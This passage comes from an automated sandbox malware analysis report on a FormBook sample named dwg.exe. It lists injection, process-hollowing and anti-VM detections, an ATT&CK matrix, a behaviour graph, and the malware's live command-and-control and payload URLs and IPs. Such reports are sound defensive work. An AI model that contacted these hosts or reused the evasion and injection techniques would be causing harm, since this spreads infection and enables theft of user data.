      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04448E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04458EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044436CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044276E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044416E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044946A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04414F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044537F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04428794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04430050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04497016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044140E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044158EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044590AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04419100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044A41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044461A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
      Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80
      Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
      Source: C:\Windows\explorer.exeNetwork Connect: 146.148.189.216 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 104.21.56.93 80
      Source: C:\Windows\explorer.exeNetwork Connect: 47.110.53.154 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread register set: target process: 3472
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3472
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: A90000
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: explorer.exe, 00000004.00000000.284110577.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
      Source: explorer.exe, 00000004.00000000.273519346.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564B00 cpuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6456, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358411 Sample: dwg.exe Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 29 www.qionglaizhan.com 2->29 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 5 other signatures 2->45 11 dwg.exe 1 2->11         started        signatures3 process4 signatures5 55 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->55 57 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->57 59 Tries to detect Any.run 11->59 61 3 other signatures 11->61 14 dwg.exe 6 11->14         started        process6 dnsIp7 37 45.153.203.33, 49716, 80 NETLABFR Netherlands 14->37 63 Modifies the context of a thread in another process (thread injection) 14->63 65 Tries to detect Any.run 14->65 67 Maps a DLL or memory area into another process 14->67 69 3 other signatures 14->69 18 explorer.exe 6 14->18 injected signatures8 process9 dnsIp10 31 www.guillemaudexcellenceauto.com 146.148.189.216, 49733, 80 HENGTONG-IDC-LLCUS United States 18->31 33 delmarranch.com 34.102.136.180, 49727, 80 GOOGLEUS United States 18->33 35 11 other IPs or domains 18->35 47 System process connects to network (likely due to code injection or exploit) 18->47 22 rundll32.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      dwg.exe28%ReversingLabsWin32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      13.2.rundll32.exe.4927960.5.unpack100%AviraTR/Dropper.GenDownload File
      13.2.rundll32.exe.6843e8.1.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      www.apkiinsurance.com0%VirustotalBrowse
      www.guillemaudexcellenceauto.com0%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.thakehamwesthorsley.com/gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.buytgp.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://45.153.203.33/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.karatetheokinawaway.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA0%Avira URL Cloudsafe
      http://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS0%Avira URL Cloudsafe
      http://45.153.203.33/mb.bin0%Avira URL Cloudsafe
      http://www.delmarranch.com/gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX30%Avira URL Cloudsafe
      http://45.153.203.33/53321935-2125563209-4053062332-10020%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      https://www.123-reg-new-domain.co.uk/iframe.html0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://45.153.203.33/mb.bintSkm0%Avira URL Cloudsafe
      http://45.153.203.33/mb.binI;0%Avira URL Cloudsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.guillemaudexcellenceauto.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      delmarranch.com
      		34.102.136.180
      		truetrue
        		unknown
        www.qionglaizhan.com
        		47.110.53.154
        		truetrue
          		unknown
          www.apkiinsurance.com
          		104.21.56.93
          		truetrueunknown
          www.guillemaudexcellenceauto.com
          		146.148.189.216
          		truetrueunknown
          www.thakehamwesthorsley.com
          		94.136.40.51
          		truetrue
            		unknown
            www.karatetheokinawaway.com
            		94.136.40.51
            		truetrue
              		unknown
              shops.myshopify.com
              		23.227.38.74
              		truetrue
                		unknown
                bestcroissantinlondon.com
                		192.0.78.25
                		truetrue
                  		unknown
                  www.buytgp.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.scriptureonhealing.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.youridealworld.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.delmarranch.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.bestcroissantinlondon.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.thakehamwesthorsley.com/gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.buytgp.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5catrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.karatetheokinawaway.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRAtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.bestcroissantinlondon.com/gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xStrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://45.153.203.33/mb.bintrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.delmarranch.com/gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3true
                            • Avira URL Cloud: safe
                            		unknown
